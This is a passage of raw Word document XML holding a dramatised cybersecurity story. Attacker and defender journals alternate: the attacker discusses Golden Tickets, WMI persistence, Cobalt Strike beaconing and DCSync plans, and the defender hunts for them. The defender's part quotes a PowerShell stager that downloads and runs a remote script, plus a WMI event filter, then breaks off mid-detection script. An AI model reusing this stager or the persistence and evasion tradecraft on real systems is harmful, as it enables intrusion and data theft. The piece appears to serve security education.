    <w:p w14:paraId="34D22B5C" w14:textId="465E8344" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t>November 7 – 0112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E5A039" w14:textId="32985A7A" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t>Attacker’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B545F09" w14:textId="4E61C131" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r w:rsidRPr="008469C1">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>͡</w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>°</w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>͜</w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>つ</w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>͡</w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>°</w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╭</w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>∩</w:t>
      </w:r>
      <w:r w:rsidRPr="008469C1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╮</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> They rotated </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t>. I felt it the moment my Golden Ticket failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C7C6B0" w14:textId="7D072337" w:rsidR="008469C1" w:rsidRDefault="008469C1" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">I was mid-operation, requesting a service ticket for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>LDAP/DC01.corp.target.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the DC returned </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KRB_AP_ERR_MODIFIED</w:t>
      </w:r>
      <w:r w:rsidR="00386FD5">
        <w:t xml:space="preserve">. That’s the error you get when the ticket signature doesn’t match the current </w:t>
      </w:r>
      <w:r w:rsidR="00386FD5" w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidR="00386FD5">
        <w:t xml:space="preserve"> hash. They friggen rotated. And they rotated </w:t>
      </w:r>
      <w:r w:rsidR="00386FD5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">twice, </w:t>
      </w:r>
      <w:r w:rsidR="00386FD5">
        <w:t>because my ticket was completely invalidated, not just flagged for renewal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25513F2C" w14:textId="7E9EE315" w:rsidR="00386FD5" w:rsidRDefault="00386FD5" w:rsidP="00572585">
      <w:r>
        <w:t>@&lt;Drops like 10 F-bombs here&gt;@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA594B1" w14:textId="57252121" w:rsidR="00386FD5" w:rsidRDefault="00386FD5" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">I knew this was coming. I just </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">knew </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it. The BloodHound run on November 3, the sudden enablement of Advanced Audit Policy, the tarpit share (and the damn hot-whatever-nuds decoy) – this defender isn’t stupid. This defender is methodical, sorta like me, and this defender </w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>smells like</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a previous red teamer, or once a black-hat turned white-hat or gray-hat. Moves like that seem like they’ve been taken straight out of our “how to hack stuffs” playbook. I can smell it. The way they set that tarpit was chef’s kiss. I almost fell for it. Well, I did fall for it. I touched the share. I couldn’t resist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15810B00" w14:textId="7126BCE1" w:rsidR="00386FD5" w:rsidRDefault="00386FD5" w:rsidP="00572585">
      <w:r>
        <w:t>But here’s another thing I’ll tell ya: I’m not out just yet. Not by far.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8F1D10" w14:textId="2B7D88BA" w:rsidR="00386FD5" w:rsidRDefault="00386FD5" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">The Golden Ticket is dead, yes. But </w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>I h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ave other access. I established persistence on </w:t>
      </w:r>
      <w:r w:rsidRPr="00315570">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FILESERVER01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> during my test run on November 5. A WMI event subscription that triggers every Tuesday at 2AM and opens a reverse shell to my C2. They haven’t found that yet because WMI persistence is invisible to most EDRs and doesn’t show up in standard scheduled task listings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4285A2B0" w14:textId="2ECD8471" w:rsidR="00386FD5" w:rsidRDefault="00386FD5" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">I also have a second Cobalt Strike beacon running on WS-HR-012 – the host I lateraled to from the initial accounting workstation. </w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> beacon has been dormant since November 3, checking in once every 72 hours with a jitter of </w:t>
      </w:r>
      <w:r w:rsidRPr="00386FD5">
        <w:t>±</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 hours. It’s using HTTPS with a legitimate </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Let’s Encrypt certificate and the User-Agent of a popular antivirus update client. It looks like a software update check.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36234D60" w14:textId="4DC6E7DE" w:rsidR="00386FD5" w:rsidRDefault="00386FD5" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">And most importantly: I still have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> credentials. The password wasn’t changed when they rotated </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t>. They fixed the master key but left the service account that compromised it untouched. Classic mistake – focusing on the crown jewels and forgetting about the crowbar that was used to pry open the main vault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15589A1A" w14:textId="1367EF35" w:rsidR="00386FD5" w:rsidRDefault="00386FD5" w:rsidP="00572585">
      <w:r>
        <w:t xml:space="preserve">I can DCSync again. Right now. From </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-HR-012</w:t>
      </w:r>
      <w:r>
        <w:t>. Pull the new krbtgt hash and forge a new Golden Ticket. It would take me ten minutes, tops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF385BB" w14:textId="2038E4D5" w:rsidR="00386FD5" w:rsidRDefault="00386FD5" w:rsidP="00572585">
      <w:r>
        <w:t>But. I won’t. Not yet. Because if I do, and they have detection for DCSync (which they now do, thanks to the audit policy they enabled), I’ll light up their SIEM</w:t>
      </w:r>
      <w:r w:rsidR="00910E27">
        <w:t xml:space="preserve"> like an all-night rave. I need to exercise better intellect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C1971F" w14:textId="64EC0D77" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00572585">
      <w:r>
        <w:t>Here is my new plan all drawn out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE2B1B" w14:textId="7FB57D54" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Wait. </w:t>
      </w:r>
      <w:r>
        <w:t>Let the incident response wind die down. Let them declare victory. Defenders always declare victory way too early when the game is not even over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734F3EF" w14:textId="5D6D7A7C" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Harvest more credentials </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-HR-012</w:t>
      </w:r>
      <w:r>
        <w:t>. It’s an HR workstation. HR people access everything – payroll, personnel files, executive calendars. I’ll find a privileged account, eventually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E636C8" w14:textId="116E56D9" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Establish deeper persistence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using legitimate administrative tools. I’ll just Live Off The Land for a bit – I can use Group Policy Preferences (GPP), SCCM deploy</w:t>
      </w:r>
      <w:r w:rsidR="00CE6E70">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ents, or even modify a logon script on a widely-used file share. Something that looks like normal operations to them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164AE449" w14:textId="392A1A5F" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">When the time is right, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DCSync the new </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash and forge me a fresh Golden Ticket. But this time, I’ll use it even more sparingly. Maybe just once a month. Just enough to maintain access without creating any detectable patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5536A4B9" w14:textId="2E04D999" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t xml:space="preserve">The defender thinks they won. They rotated </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t>, they blocked my IP – big whoop – they probably even wrote a triumphant incident report. Good for them. Enjoy the weekend, blue team. I’ll be here when you return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB6EA9" w14:textId="6B48E37C" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t xml:space="preserve">I do have to note one thing that has been bothering me, however. That tarpit. The way it was named, the way it was monitored – that to me seemed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">personal. </w:t>
      </w:r>
      <w:r>
        <w:t>That defender wanted me to touch it. They were taunting me. And I took the bait because I couldn’t resist looking at the nuds…er eh I mean couldn’t resist proving the Golden Ticket worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEC571B" w14:textId="46318185" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t>I need to be more disciplined. No more ego. No more “let me just check if this works.” No more being nosey and curious. Every action must have operational value. Every touch must advance the mission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BAB559" w14:textId="3E8E786C" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The mission is: long-term access to executive communications and merger documentation. Six-month timeline. Invisible. Quiet. Patient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171016F7" w14:textId="74C5288D" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t>I can do this. I’ve done it before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD796B1" w14:textId="782D8FD6" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t>But first, I need to deal with a more immediate problem. My C2 infrastructure in Romania is showing signs of reconnaissance. Someone is scanning the IP range. Not random internet noise – targeted port scans on 443 and 8443, the exact ports I’m using. Could be the defender’s threat intel team. Could be a security researcher. Could be law enforcement. Could be the ISP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569495F2" w14:textId="3E294E4A" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t>I’m burning the Romanian infrastructure tonight. New C2 in Singapore, new domain through CloudFront instead of Azure CDN, new malleable C2 profile that mimics Windows Update traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019B6092" w14:textId="749C39AC" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t>This is just the cost of doing business. But it tells me they’re not just playing defense anymore – they’re thirsty for blood and are on the hunt. And that makes this even more interesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2116D" w14:textId="6A6A1B5E" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t>November 7 – 0923</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736AF877" w14:textId="2B468F5C" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t>Defender’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A7D444" w14:textId="4A0F8D82" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rotation bought us time. It doesn’t mean we won the war.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E30688" w14:textId="75CD7182" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t>I’ve been running continuous hunts for the past 48 hours, and I’m finding… things. Not smoking guns per se, but anomalies that just don’t fit the puzzle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E12167" w14:textId="07EA53AB" w:rsidR="00910E27" w:rsidRDefault="00910E27" w:rsidP="00910E27">
      <w:r>
        <w:t xml:space="preserve">First, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-HR-012</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – the HR workstation that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-ACCT-047</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> had local admin rights on – showed a suspicious process creation at 0347 on November 3. Same time as the initial compromise. </w:t>
      </w:r>
      <w:r w:rsidR="007B3505" w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>owershell.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> spawned </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which spawned </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>conhost.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Normal enough, except the PowerShell command line was </w:t>
      </w:r>
      <w:r w:rsidR="007B3505" w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAOAAwADAA</w:t>
      </w:r>
      <w:r w:rsidR="007B3505">
        <w:t xml:space="preserve">… - base64 encoded. Decoded, it’s </w:t>
      </w:r>
      <w:r w:rsidR="007B3505" w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Start-Sleep -s 100800</w:t>
      </w:r>
      <w:r w:rsidR="007B3505">
        <w:t>. That’s 28 hours of sleep. Why would a PowerShell script sleep for 28 hours???</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABE1B9A" w14:textId="1587E044" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="00910E27">
      <w:r>
        <w:t>Because it’s a beacon, that’s why. It’s waiting. Checking in on a long interval to avoid detection. The process tree was gone by the time I looked – self-terminated after the sleep. But the Windows Event Log captured the command line before execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D82F8A" w14:textId="1F32CA2E" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="00910E27">
      <w:r>
        <w:t>I checked the EDRs historical process data for WS-HR-012. Nothing after November 3. The beacon either hasn’t checked back in, or it’s using a completely different process for subsequent communications. But I know it’s there. Or was there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235FF16B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Second anomaly: FILESERVER01 has a WMI event subscription I didn’t create. I found it using </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>Get-WmiObject -Class __EventFilter -Namespace root\subscription:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2085D7CF" w14:textId="77777777" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r>
        <w:t>Name: SCOMHealthCheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D0A64A" w14:textId="49B4D1E0" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r>
        <w:t>Query: SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8E8B55" w14:textId="1BE6A059" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r>
        <w:t>Looks like a System Center Operations Manager health check, right? Except we don’t use SCCM. I was told we haven’t used it for the past three years. And the _EventConsumer associated with this filter is a CommandLineEventConsumer that runs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A2EF0" w14:textId="7A867DF2" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>powershell.exe -nop -w hidden -c "iex (New-Object Net.WebClient).DownloadString('https://windows-update-catalog[.]cdn[.]com/s/healthcheck.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F163983" w14:textId="46ED90E1" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>That's not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> even</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> Microsoft. That's a Cobalt Strike stager. The domain windows-update-catalog.cdn.com is registered through a privacy service in Panama. The TLS certificate is Let's Encrypt. The file healthcheck.ps1 is a 12KB script that, when I pulled it from a sandbox, deobfuscated to a standard Cobalt Strike payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A34510C" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>They've been on FILESERVER01 since at least November 5. That's two days of potential data access. Two days of lateral movement. Two days of... what? What did they take?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5864182B" w14:textId="35399644" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I checked the file server access logs. Normal SMB traffic. Nothing anomalous. But that doesn't mean anything — if they used their Golden Ticket to access shares, the logs would show the forged account name, not a real one. And my SIEM searches for fakeuser only showed the one </w:t>
      </w:r>
      <w:r>
        <w:t>tarpit</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> access on November 5. So either they didn't access other shares, or they used a different forged account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6D3873" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I need to think like them. If I had a Golden Ticket and I wanted to be invisible, how would I use it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67497EC9" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I'd create multiple fake accounts, each with different privileges. I'd rotate between them. I'd access resources during business hours when log volume is high. I'd use legitimate service names and encryption types. I'd make my traffic look like normal administrative activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B991F7B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">So I wrote a new detection: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"Phantom User Hunting."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43249803" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># Find accounts that have requested Kerberos service tickets but don't exist in AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE87963" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>$recentTickets = Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769; StartTime=(Get-Date).AddDays(-7)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A85C40D" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$adUsers = Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BEEE94" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD38505" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>foreach ($ticket in $recentTickets) {</w:t>
      </w:r>
    </w:p>
